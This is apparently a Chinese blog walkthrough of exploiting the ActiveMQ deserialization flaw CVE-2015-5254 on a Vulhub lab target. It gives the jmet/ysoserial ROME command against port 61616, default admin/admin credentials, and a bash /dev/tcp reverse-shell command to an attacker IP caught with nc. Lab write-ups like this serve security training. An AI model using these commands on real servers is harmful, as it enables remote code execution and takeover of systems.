Vulhub靶机 ActiveMQ 反序列化漏洞(CVE-2015-5254)(渗透测试详解)

一、开启vulhub环境

复制代码
docker-compose up -d  启动
docker ps 查看开放的端口

漏洞版本:Apache ActiveMQ 5.x ~ Apache ActiveMQ 5.13.0

二、访问靶机IP 8161端口

默认账户密码 admin/admin,登录

此时qucues事件为空

1、使用jmet-0.1.0-all.jar工具将有效负载发送到目标IP的61616端口

jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。

复制代码
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,反弹shell
命令(base64加密)}|{base64,-d}|{bash,-i}" -Yp ROME 目标IP 61616

反弹shell命令:echo "bash -i>& /dev/tcp/x.x.x.x/4444 0>&1"> /tmp/shell.sh && bash /tmp/shell.sh

出现此情况,是Java版本过高,根据以下链接更换Java版本

复制代码
https://blog.csdn.net/weixin_46686336/article/details/140635571

切换完成后重新执行命令

出现以上情况就是执行成功

2、返回web页面,刷新

此时就多了一个事件,证明shell已经成功写入

3、攻击机开启nc监听

三、点击事件,成功反弹

至此,成功拿下系统权限。

下期再见,家人们!

相关推荐
xlp666hub2 分钟前
深度剖析 Linux Input 子系统(3):从零写一个 Input 驱动,最详细手把手(附完整代码)
linux·面试
RisunJan1 小时前
Linux命令-modprobe(自动处理可载入模块)
linux·运维
何朴尧1 小时前
OpenClaw Linux 完整安装指南
linux
木木em哈哈1 小时前
记一次在线编辑器的探索
linux·服务器·网络
一个有温度的技术博主1 小时前
网安实验系列一:Burp Suite探测敏感信息路径
网络·安全
我要成为嵌入式大佬2 小时前
正点原子MP157--问题详解--二(NFS挂载根文件系统双网卡设置)
linux·服务器·网络
一个有温度的技术博主2 小时前
网安实验系列七:域名收集
linux·运维·服务器
我爱学习好爱好爱2 小时前
Ansible 环境搭建
linux·运维·ansible
人工智能训练3 小时前
从 1.1.3 到 1.13.2!Ubuntu 24.04 上 Dify 升级保姆级教程(零数据丢失 + 一键迁移)
linux·运维·人工智能·windows·ubuntu·dify
lifejump3 小时前
双冗余链路实现(2/2期)
网络